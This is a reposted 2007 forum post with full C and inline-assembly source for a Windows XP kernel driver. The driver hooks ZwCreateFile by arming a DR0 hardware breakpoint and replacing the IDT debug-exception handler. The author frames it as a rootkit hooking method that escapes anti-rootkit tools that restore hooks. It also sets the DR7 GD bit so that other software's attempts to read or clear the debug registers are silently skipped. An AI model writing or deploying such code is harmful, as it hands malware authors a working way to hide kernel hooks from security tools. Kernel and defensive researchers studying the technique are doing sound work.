
[转载]Another way to HOOK in the kernel

[转载]Another way to HOOK in the kernel

文章作者:yykingking@126.com

@ :: worthy ::   Jun 24 2007, 22:36 (UTC+0)

yykingking writes: Rootkits usually hook important functions to hide things, and some anti-rootkit tools (ARKs) first restore those hooks (commonly using the copy on disk) and then call the function.
This is another way to hook in the kernel, using the DRx debug registers. You can google the DRx registers; there should be plenty of information. Because my English is poor I only post some simple code below; if you read Chinese, you can follow the comments.

This code should be run on XP; it simply hooks ZwCreateFile and prints debug information.
代码:
/*
drxhook.h
Written By [email]yykingking@126.com[/email]
*/

#ifndef _DRX_HOOK
#define _DRX_HOOK

#include <ntddk.h>

// Local integer typedefs; ntddk.h provides ULONG/UCHAR but not these Win32 names.
typedef unsigned long DWORD;
// NOTE: one byte wide (unlike the int-sized Win32 BOOL). g_bExit is declared with
// this type and is compared by the inline asm `cmp g_bExit, 0` in NewDBEntry.
typedef unsigned char BOOL;

#pragma pack(push,1)
// Memory image written by the `sidt` instruction: a 16-bit limit followed by a
// 32-bit linear base — 6 bytes with no padding, hence pack(1).
typedef struct _idtr
{
  // limit of the interrupt descriptor table, two bytes
  short    IDTLimit;
  // base address of the interrupt descriptor table, four bytes
  unsigned int  IDTBase;
}IDTR,*PIDTR;

// One 8-byte IDT gate descriptor as laid out by the CPU. GetDBEntry, HookDBInt
// and UnHookDBInt only touch the split handler offset (LowOffset:HiOffset);
// the selector, type, DPL and P fields are never written by this code.
typedef struct _IDTENTRY
{
  unsigned short LowOffset;      // handler offset, bits 0..15
  unsigned short selector;       // code segment selector
  unsigned char unused_lo;
  unsigned char segment_type:4;  //0x0E is an interrupt gate
  unsigned char system_segment_flag:1;
  unsigned char DPL:2;  // descriptor privilege level
  unsigned char P:1; /* present */
  unsigned short HiOffset;       // handler offset, bits 16..31
} IDTENTRY,*PIDTENTRY;

#pragma pack(pop)

// Read the handler address currently installed for IDT vector 1 (#DB) on the
// executing CPU; also fills g_IDTR as a side effect.
DWORD GetDBEntry();
// Install NewDBEntry as the vector 1 handler and arm DR0 on ZwCreateFile.
void HookDBInt();
// Put the saved vector 1 handler back; called from DriverUnload.
void UnHookDBInt();

#endif


/*
drxhook.cpp
Written By [email]yykingking@126.com[/email]
*/


#include "drxhook.h"

DWORD g_OldDBEntry;     // original IDT vector 1 (#DB) handler, saved by HookDBInt; UnHookDBInt skips the restore while it is 0
IDTR g_IDTR;            // destination of the `sidt` executed in GetDBEntry and UnHookDBInt
DWORD g_OldCreateFile;  // ZwCreateFile + 5: where NewZwCreateFile jumps after re-issuing the first instruction
DWORD g_HookNumber = 0; // hook hit counter, printed and incremented by PrintHook
DWORD g_CR0;            // CR0 saved by CliAndDisableWPBit and restored by ReLoadCR0AndSti
BOOL g_bExit;           // set by UnHookDBInt; NewDBEntry then stops re-arming DR7.GD

/*
 * Restore CR0 from g_CR0 (re-enabling the write protection that
 * CliAndDisableWPBit cleared) and re-enable interrupts with `sti`.
 * Always paired with a preceding CliAndDisableWPBit on the same CPU.
 */
void ReLoadCR0AndSti()
{
  __asm
  {
    push  eax
      mov    eax, g_CR0
      mov    cr0, eax
      pop    eax
      sti
  }
}

/*
 * Disable interrupts, save CR0 into g_CR0, then clear CR0.WP (bit 16,
 * mask 0xFFFEFFFF) so that pages mapped read-only — presumably the IDT —
 * can be written by HookDBInt / UnHookDBInt. Undone by ReLoadCR0AndSti.
 */
void CliAndDisableWPBit()
{
  __asm
  {
    cli
      push  eax
      mov    eax, cr0
      mov    g_CR0, eax
      and    eax, 0xFFFEFFFF
      mov    cr0, eax
      pop    eax
  }
}


/*
 * Called from NewZwCreateFile on every hook hit: logs the current hit
 * number and the calling process id, then advances g_HookNumber.
 */
void PrintHook()
{
  DWORD hitIndex = g_HookNumber;
  DWORD pid = (DWORD)PsGetCurrentProcessId();

  g_HookNumber = hitIndex + 1;
  DbgPrint(" Now Get In ZwCreateFile Hook: %d...Pid: %d...\n", hitIndex, pid);
}

/*
 * Naked hook body that NewDBEntry redirects the faulting EIP to.
 * Preserves EFLAGS around PrintHook, then issues `mov eax, 0x25` —
 * presumably the 5-byte first instruction of ZwCreateFile on XP that the
 * DR0 breakpoint sits on (confirm against the target build) — and resumes
 * at ZwCreateFile + 5 (g_OldCreateFile). The constant is XP-specific.
 */
__declspec(naked) void NewZwCreateFile()
{
  __asm
  {  
    pushfd;            // only suitable for the XP operating system
    call PrintHook;
    popfd;
    mov eax,0x25;      
    jmp g_OldCreateFile;
  }
}

/*
 * Arm hardware breakpoint 0 on ZwCreateFile (executing CPU only):
 *   DR0  = address of ZwCreateFile
 *   DR7 |= 0x2703  -> L0/G0 (bits 0-1) enable DR0, LE/GE (bits 8-9),
 *                     bit 10 (reserved, reads as 1), GD (bit 13): from now
 *                     on any mov to/from a debug register raises #DB,
 *                     which NewDBEntry intercepts
 *   DR7 &= 0xFFF0FFFF -> R/W0 = LEN0 = 0: break on instruction execution
 * From an inspection standpoint, DR7.GD being set together with IDT
 * vector 1 resolving outside the kernel image is the visible artefact.
 */
void SetHB()      // set hardware breakpoint
{
  __asm
  {
    mov eax, ZwCreateFile;    // the function or address to hook
    mov dr0, eax;
    mov eax, dr7;
    or eax, 0x2703;      // also set the DR7 GD bit, so DrX cannot be changed by the OS or other programs unnoticed
    and eax, 0xfff0ffff;
    mov dr7, eax;
  }
}

/*
 * Replacement handler for IDT vector 1 (#DB). #DB pushes no error code, so
 * on entry [esp] = EIP, [esp+4] = CS, [esp+8] = EFLAGS; after the pushfd and
 * push eax below the faulting EIP sits at [esp+8].
 * Three cases:
 *   DR6.BD (0x2000) set -> code touched a debug register while GD was armed:
 *     clear BD, skip the 3-byte instruction, re-arm GD — unless g_bExit is
 *     set, in which case GD is left clear so UnHookDBInt can finish.
 *   DR6.B0 (0x1) set and EIP == ZwCreateFile -> DR0 fired on the hooked
 *     entry point: rewrite the return EIP to NewZwCreateFile.
 *   anything else -> chain to the original handler in g_OldDBEntry.
 * Only EAX and EFLAGS are saved; no other register is used.
 */
__declspec(naked) void NewDBEntry()
{
  __asm
  {
    pushfd;
    push eax;

    mov eax, dr6;
    test eax, 0x2000;    // DR6.BD: a debug-register access was detected (GD)
    jz NOT_EDIT_DRX;

    // Below is a simple treatment of accesses to the DRX registers; change it
    // if needed. Here the accessing instruction is simply skipped.
    and eax, 0xFFFFDFFF;
    mov dr6, eax;      // clear the DR6 flag

    cmp g_bExit, 0;
    jnz MY_DRV_EXIT;    // driver is unloading

    mov eax, [esp+8];    // fetch the EIP from the stack
    add eax, 3;        // because every operation on DRX is 3 bytes long
    mov [esp+8], eax;    // modify EIP: skip the current instruction, run the next one on return

    jmp MY_INT_END;

NOT_EDIT_DRX:

    mov eax, dr6;
    test eax, 0x1;
    jz SYS_INT;      // if the exception was not raised by Dr0, go back to the original system handler

    mov eax, [esp+8];
    cmp eax, ZwCreateFile;  // check whether this is the linear address of ZwCreateFile
    jnz SYS_INT;

    mov eax, NewZwCreateFile;
    mov [esp+8],eax;    // modify the EIP on the stack so the return lands in the hook


MY_INT_END:  

    mov eax, dr7;
    or eax, 0x2000;    // restore the GD bit (the CPU clears it when it raises #DB)
    mov dr7, eax;

MY_DRV_EXIT:          // when the whole driver unloads, Dr7 is not restored

    pop eax;
    popfd;
    iretd;

SYS_INT:
    pop eax;
    popfd;
    jmp g_OldDBEntry;
   
  }
}

/*
 * Return the 32-bit handler address currently installed for IDT vector 1
 * (#DB) on the executing CPU. Side effect: overwrites g_IDTR via `sidt`.
 * Vector 1 is the second 8-byte gate, hence IDTBase + 8.
 */
DWORD GetDBEntry()
{
  PIDTENTRY IdtEntry;
  DWORD Entry;

  __asm sidt g_IDTR;   // store the IDT register (limit + base) into g_IDTR

  IdtEntry = (PIDTENTRY)(g_IDTR.IDTBase + 8);

  // Reassemble the split offset field of the gate descriptor.
  Entry = IdtEntry->HiOffset << 16;
  
  Entry |= IdtEntry->LowOffset;

  return Entry;
}

/*
 * Install the hook on the executing CPU:
 *   1. record g_OldCreateFile = ZwCreateFile + 5, the resume point used by
 *      NewZwCreateFile (assumes a 5-byte first instruction — XP-specific);
 *   2. save the current vector 1 handler in g_OldDBEntry (GetDBEntry also
 *      refreshes g_IDTR, which is what the gate pointer below relies on);
 *   3. with interrupts off and CR0.WP cleared, overwrite only the two
 *      offset halves of the vector 1 gate with NewDBEntry — selector,
 *      type, DPL and P are left as they were;
 *   4. arm DR0/DR7 via SetHB and clear g_bExit.
 * IDT and debug registers are per-processor state; nothing here touches
 * other CPUs. An inspection tool comparing vector 1 and DR7 against
 * expected values therefore has to look at every processor.
 */
void HookDBInt()
{
  DWORD NewEntry;
  PIDTENTRY IdtEntry;

  NewEntry = (DWORD)NewDBEntry;

  g_OldCreateFile = (DWORD)ZwCreateFile + 5;    // the new address to jump to (past the first instruction)

  g_OldDBEntry = GetDBEntry();

  IdtEntry = (PIDTENTRY)(g_IDTR.IDTBase + 8);   // vector 1 gate, from the g_IDTR just filled by GetDBEntry

  CliAndDisableWPBit();   // interrupts off and CR0.WP clear while the gate is patched

  IdtEntry->LowOffset = (USHORT)NewEntry;

  IdtEntry->HiOffset = (USHORT)( NewEntry >> 16 );

  ReLoadCR0AndSti();

  SetHB();    // arm DR0; from here on #DB is routed through NewDBEntry

  g_bExit = FALSE;

  return;
}

/*
 * Undo HookDBInt on the executing CPU:
 *   - refresh g_IDTR and locate the vector 1 gate;
 *   - interrupts off, CR0.WP cleared;
 *   - set g_bExit, then read DR7: with GD armed this raises #DB, which
 *     NewDBEntry takes through MY_DRV_EXIT — BD is cleared, the read is
 *     skipped and GD is deliberately not re-armed, so GD stays clear once
 *     the hook is gone;
 *   - put the saved handler offset back if one was recorded
 *     (g_OldDBEntry != 0);
 *   - restore CR0 and interrupts, log.
 * Review note: DR0 and the DR7 enable bits written by SetHB are not
 * cleared here; only GD is dropped (by the CPU when the fault fires).
 * What happens on the next DR0 hit once the original handler is back is
 * not established by this code — confirm on the target before relying on
 * a clean unload. Leftover DR0/DR7 state is also a post-unload artefact
 * an analyst can look for. The local `Entry` is unused.
 */
void UnHookDBInt()
{
  PIDTENTRY IdtEntry;
  DWORD Entry;
  
  __asm sidt g_IDTR;   // re-read the IDT base for this CPU
  
  IdtEntry = (PIDTENTRY)(g_IDTR.IDTBase + 8);

  CliAndDisableWPBit();

  g_bExit = TRUE;   // must precede the DR7 read: NewDBEntry tests it on the GD fault

  __asm mov eax, dr7;        // raise one exception and clear Dr7:GD

  if ( g_OldDBEntry != 0 )
  {
    IdtEntry->LowOffset = (USHORT)g_OldDBEntry;
   
    IdtEntry->HiOffset = (USHORT)( g_OldDBEntry >> 16 );   
  }

  ReLoadCR0AndSti();
  
  DbgPrint(" UnLoad drx hook..\n");

  return;
}

/*
 * Driver unload callback: removes the #DB hook on the current CPU.
 * NOTE(review): DRIVER_UNLOAD callbacks are declared VOID; this one returns
 * NTSTATUS, so the assignment in DriverEntry relies on the build tolerating
 * the signature mismatch — confirm against the WDK headers in use.
 */
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{  
  NTSTATUS status = STATUS_SUCCESS;

  (void)DriverObject;   // unused: all hook state lives in file-scope globals
  UnHookDBInt();

  return status;
}

/*
 * Driver entry point: installs the hook, registers DriverUnload so it can
 * be removed, and logs success. HookDBInt reports no status, so there is
 * nothing to check before returning STATUS_SUCCESS. RegistryPath is unused.
 */
NTSTATUS DriverEntry(
           IN PDRIVER_OBJECT DriverObject,
           IN PUNICODE_STRING RegistryPath
           )
{
  NTSTATUS status = STATUS_SUCCESS;

  (void)RegistryPath;

  HookDBInt();
  DriverObject->DriverUnload = DriverUnload;
  DbgPrint("Load drxhook Driver Ok...\n");

  return status;
}
/***********************/

